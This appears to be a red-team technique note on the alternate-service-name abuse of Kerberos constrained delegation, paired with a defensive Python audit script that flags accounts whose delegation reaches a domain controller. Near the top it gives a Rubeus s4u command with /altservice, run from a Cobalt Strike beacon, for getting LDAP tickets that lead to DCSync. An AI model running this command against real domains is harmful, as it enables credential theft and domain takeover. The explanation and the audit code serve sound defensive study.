Kerberos does not validate the service name (service class) of the SPN when enforcing constrained delegation; the KDC only checks which account runs the target service. So if a service account is configured for constrained delegation to CIFS on a host, that service account can technically request a TGS for LDAP on the same host, because both CIFS and LDAP run under the same machine account. A ticket for LDAP on a domain controller can then be used to perform a DCSync attack.

To exploit this loophole, add the /altservice:[target-service] option when exploiting constrained delegation:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:[target-user] /msdsspn:[allowed-spn] /altservice:[target-service-under-same-account-as-spn] /user:[user-allowed-to-delegate] /ticket:[user-ticket-base64] /nowrap
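A defender-side audit that follows from the point above, written for this page as an added example (it is not code from the original post or from Rubeus): it collapses each account's msDS-AllowedToDelegateTo SPNs to hosts, since the service class is not enforced, and flags accounts whose effective delegation scope includes a domain controller. The account names, SPNs and DC host names below are constructed sample data.

```python
# Added example (not from the original page): compute the *effective* scope of
# constrained delegation. Because the KDC validates only the target account
# (host), not the service class, "cifs/dc01.corp.local" effectively also grants
# "ldap/dc01.corp.local" on that host via an alternate service name.
from __future__ import annotations
from collections import defaultdict

# Constructed sample: account -> msDS-AllowedToDelegateTo values (hypothetical)
ALLOWED_TO_DELEGATE_TO = {
    "svc_web": ["cifs/dc01.corp.local", "cifs/dc01"],
    "svc_backup": ["http/app01.corp.local/CORP"],
    "svc_sql": ["MSSQLSvc/sql01.corp.local:1433", "ldap/dc02.corp.local"],
}
# Constructed sample: domain controller hosts (short and FQDN forms)
DOMAIN_CONTROLLERS = {"dc01", "dc01.corp.local", "dc02", "dc02.corp.local"}


def spn_host(spn: str) -> str:
    """Return the host part of an SPN, dropping the service class, an optional
    port and an optional instance name:
    'MSSQLSvc/sql01.corp.local:1433' -> 'sql01.corp.local'."""
    _, _, rest = spn.partition("/")
    host = rest.split("/", 1)[0]          # strip optional service name suffix
    return host.split(":", 1)[0].lower()  # strip optional port


def effective_delegation_hosts(allowed: dict[str, list[str]]) -> dict[str, set[str]]:
    """Collapse each account's allowed SPNs to the set of hosts it can obtain
    service tickets for, regardless of the service class listed."""
    hosts: dict[str, set[str]] = defaultdict(set)
    for account, spns in allowed.items():
        for spn in spns:
            hosts[account].add(spn_host(spn))
    return dict(hosts)


def accounts_with_dc_reach(allowed: dict[str, list[str]], dcs: set[str]) -> list[str]:
    """Accounts whose effective scope includes a domain controller host; these
    can reach LDAP on the DC through an alternate service name and should be
    reviewed (remove the delegation, or at least mark the account sensitive)."""
    dc_hosts = {d.lower() for d in dcs}
    scope = effective_delegation_hosts(allowed)
    return sorted(acct for acct, hosts in scope.items() if hosts & dc_hosts)


if __name__ == "__main__":
    for acct in accounts_with_dc_reach(ALLOWED_TO_DELEGATE_TO, DOMAIN_CONTROLLERS):
        print(f"{acct}: delegation target includes a domain controller")
```

In a real environment the input dictionary would be filled from an LDAP query for objects with msDS-AllowedToDelegateTo set; the matching logic is unchanged.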